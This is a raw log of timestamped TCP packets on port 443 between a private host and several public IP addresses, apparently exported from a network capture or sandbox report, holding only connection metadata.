Nov 2, 2024 17:56:32.672275066 CET	49755	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:32.672288895 CET	443	49755	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:32.672404051 CET	49755	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:32.677298069 CET	49756	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:32.677335024 CET	443	49756	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:32.677561045 CET	49756	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:32.679323912 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:32.680608034 CET	49758	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:32.680623055 CET	443	49758	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:32.680691004 CET	49758	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:32.681000948 CET	49755	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:32.681018114 CET	443	49755	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:32.681368113 CET	49756	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:32.681400061 CET	443	49756	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:32.682176113 CET	49758	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:32.682190895 CET	443	49758	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:32.688040018 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:32.688055992 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:32.698076010 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:32.698138952 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:32.698164940 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:32.698189020 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:32.698225975 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:32.698462009 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:32.698731899 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:32.698781967 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:32.698795080 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:32.709090948 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:32.709295034 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:32.709320068 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:32.709343910 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:32.715949059 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:32.715964079 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:33.006932020 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.006969929 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.006977081 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.006989956 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.007025957 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.007042885 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:33.007066011 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.007082939 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:33.007113934 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:33.010019064 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.010077953 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:33.010087013 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.053936958 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:33.131899118 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.131958008 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.132005930 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:33.392879963 CET	443	49754	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.393524885 CET	49754	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.393543959 CET	443	49754	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.394666910 CET	49754	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.394675970 CET	443	49754	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.429017067 CET	443	49756	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.429393053 CET	443	49758	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.429538965 CET	49756	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.429578066 CET	443	49756	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.429621935 CET	443	49753	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.429850101 CET	49758	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.429867029 CET	443	49758	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.430042982 CET	49756	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.430048943 CET	443	49756	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.430373907 CET	49758	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.430381060 CET	443	49758	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.430468082 CET	49753	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.430480957 CET	443	49753	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.430833101 CET	49753	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.430839062 CET	443	49753	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.449729919 CET	443	49755	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.450226068 CET	49755	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.450241089 CET	443	49755	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.450761080 CET	49755	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.450768948 CET	443	49755	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.521547079 CET	443	49754	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.521627903 CET	443	49754	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.521689892 CET	49754	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.521907091 CET	49754	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.521907091 CET	49754	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.521924973 CET	443	49754	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.521935940 CET	443	49754	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.525422096 CET	49764	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.525466919 CET	443	49764	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.525528908 CET	49764	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.525671959 CET	49764	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.525686026 CET	443	49764	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.558240891 CET	443	49756	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.558424950 CET	443	49756	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.558481932 CET	49756	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.558650017 CET	49756	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.558670044 CET	443	49756	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.558679104 CET	49756	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.558685064 CET	443	49756	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.559956074 CET	443	49758	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.560141087 CET	443	49758	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.560201883 CET	49758	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.560235023 CET	49758	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.560240984 CET	443	49758	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.560266972 CET	49758	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.560271025 CET	443	49758	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.562181950 CET	49765	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.562232971 CET	443	49765	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.562305927 CET	49765	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.568492889 CET	49766	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.568541050 CET	443	49766	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.568599939 CET	49766	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.568691969 CET	49765	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.568728924 CET	443	49765	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.568914890 CET	49766	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.568936110 CET	443	49766	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.569729090 CET	443	49753	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.569853067 CET	443	49753	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.569902897 CET	49753	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.570215940 CET	49753	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.570235014 CET	443	49753	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.570245981 CET	49753	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.570251942 CET	443	49753	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.574016094 CET	49767	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.574059963 CET	443	49767	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.574206114 CET	49767	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.574441910 CET	49767	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.574460983 CET	443	49767	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.585267067 CET	443	49755	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.585339069 CET	443	49755	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.585391045 CET	49755	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.585522890 CET	49755	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.585530996 CET	443	49755	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.585544109 CET	49755	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.585547924 CET	443	49755	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.589292049 CET	49768	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.589343071 CET	443	49768	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.589447975 CET	49768	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.589584112 CET	49768	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:33.589601040 CET	443	49768	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:33.673504114 CET	49677	443	192.168.2.7	20.50.201.200
Nov 2, 2024 17:56:33.909040928 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:33.909040928 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:33.909089088 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.909120083 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:33.964118958 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:33.964169979 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:33.964349985 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:33.965454102 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:33.965478897 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:34.262994051 CET	443	49764	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.263556957 CET	49764	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.263587952 CET	443	49764	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.265367031 CET	49764	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.265374899 CET	443	49764	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.313420057 CET	443	49767	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.314436913 CET	49767	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.314438105 CET	49767	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.314476013 CET	443	49767	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.314496040 CET	443	49767	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.325567961 CET	443	49766	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.326571941 CET	49766	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.326571941 CET	49766	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.326610088 CET	443	49766	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.326658010 CET	443	49766	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.330445051 CET	443	49765	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.330912113 CET	49765	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.330930948 CET	443	49765	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.331424952 CET	49765	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.331434011 CET	443	49765	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.334734917 CET	443	49768	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.335602999 CET	49768	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.335603952 CET	49768	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.335614920 CET	443	49768	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.335629940 CET	443	49768	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.394094944 CET	443	49764	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.394253016 CET	443	49764	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.394455910 CET	49764	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.394455910 CET	49764	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.394759893 CET	49764	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.394773960 CET	443	49764	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.397196054 CET	49770	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.397226095 CET	443	49770	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.397589922 CET	49770	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.397708893 CET	49770	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.397725105 CET	443	49770	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.445219994 CET	443	49767	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.445300102 CET	443	49767	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.447957993 CET	49767	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.447957993 CET	49767	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.448013067 CET	49767	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.448035002 CET	443	49767	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.450589895 CET	49771	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.450628996 CET	443	49771	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.456815004 CET	49771	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.459671974 CET	443	49766	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.459733963 CET	443	49766	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.461241961 CET	49766	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.464835882 CET	49771	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.464857101 CET	443	49771	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.464874029 CET	443	49768	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.464960098 CET	443	49768	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.465341091 CET	49766	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.465356112 CET	443	49766	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.465373993 CET	49766	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.465379953 CET	443	49766	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.465408087 CET	49768	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.465452909 CET	443	49765	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.465538025 CET	49768	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.465560913 CET	443	49768	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.465612888 CET	49768	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.465621948 CET	443	49768	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.465634108 CET	443	49765	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.465758085 CET	49765	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.465914011 CET	49765	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.465914011 CET	49765	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.465924978 CET	443	49765	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.465933084 CET	443	49765	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.469361067 CET	49772	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.469392061 CET	443	49772	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.469429970 CET	49773	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.469460964 CET	443	49773	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.469489098 CET	49772	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.469669104 CET	49772	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.469671011 CET	49773	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.469680071 CET	443	49772	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.469752073 CET	49773	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.469758987 CET	443	49773	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.472608089 CET	49774	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.472630978 CET	443	49774	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.472824097 CET	49774	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.472943068 CET	49774	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:34.472955942 CET	443	49774	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:34.830152035 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:34.830216885 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:34.838361025 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:34.838385105 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:34.838742018 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:34.882488012 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:34.891155958 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:34.931335926 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:35.140484095 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:35.140552998 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:35.140717030 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:35.154026985 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:35.154064894 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:35.154088974 CET	49769	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:35.154097080 CET	443	49769	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:35.201905012 CET	443	49772	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.206896067 CET	443	49771	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.237432003 CET	443	49774	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.238114119 CET	443	49773	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.244752884 CET	49773	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.244774103 CET	443	49773	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.247061968 CET	49773	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.247070074 CET	443	49773	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.247351885 CET	49772	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.247374058 CET	443	49772	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.247970104 CET	49772	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.247981071 CET	443	49772	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.248509884 CET	49771	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.248522997 CET	443	49771	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.249109983 CET	49771	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.249114990 CET	443	49771	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.250056982 CET	49774	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.250071049 CET	443	49774	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.250546932 CET	49774	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.250555038 CET	443	49774	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.373574018 CET	443	49772	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.373663902 CET	443	49772	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.373974085 CET	49772	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.378393888 CET	443	49773	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.378454924 CET	443	49773	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.378545046 CET	49773	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.380279064 CET	443	49771	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.380358934 CET	443	49771	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.380511045 CET	443	49774	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.380573034 CET	49771	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.380867004 CET	443	49774	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.380914927 CET	49774	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.407320023 CET	49777	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:35.407366037 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:35.407445908 CET	49777	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:35.407855034 CET	49777	443	192.168.2.7	184.28.90.27
Nov 2, 2024 17:56:35.407867908 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:35.423301935 CET	49772	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.423301935 CET	49772	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.423350096 CET	443	49772	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.423384905 CET	443	49772	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.462704897 CET	49774	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.462759018 CET	443	49774	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.462775946 CET	49774	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.462784052 CET	443	49774	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.507075071 CET	443	49770	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.552401066 CET	49770	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.576941013 CET	49771	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.576987028 CET	443	49771	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.577002048 CET	49771	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.577009916 CET	443	49771	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.886303902 CET	49770	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.886328936 CET	443	49770	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.887072086 CET	49770	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.887079000 CET	443	49770	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.887298107 CET	49773	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.887299061 CET	49773	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.887331009 CET	443	49773	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.887342930 CET	443	49773	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.911648989 CET	49779	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.911686897 CET	443	49779	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.911757946 CET	49779	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.916434050 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:35.916476965 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:35.916543007 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:35.916878939 CET	49780	443	192.168.2.7	142.250.186.46
Nov 2, 2024 17:56:35.916889906 CET	443	49780	142.250.186.46	192.168.2.7
Nov 2, 2024 17:56:35.918982029 CET	49781	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.919017076 CET	443	49781	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.919076920 CET	49781	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.920824051 CET	49782	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.920855999 CET	443	49782	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.920909882 CET	49782	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.924515009 CET	49779	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.924535990 CET	443	49779	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.926356077 CET	49783	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.926388025 CET	443	49783	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.926450014 CET	49783	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.926599026 CET	49783	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.926609039 CET	443	49783	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.926666021 CET	49781	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.926675081 CET	443	49781	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:35.926995993 CET	49782	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:35.927009106 CET	443	49782	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.014796972 CET	443	49770	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.014878035 CET	443	49770	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.014950991 CET	49770	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.018919945 CET	49770	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.018919945 CET	49770	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.018948078 CET	443	49770	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.018959999 CET	443	49770	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.026190042 CET	49784	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.026232004 CET	443	49784	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.026289940 CET	49784	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.027096033 CET	49784	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:36.027106047 CET	443	49784	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:36.296458006 CET	443	49777	184.28.90.27	192.168.2.7
Nov 2, 2024 17:56:36.296530962 CET	49777	443	192.168.2.7	184.28.90.27
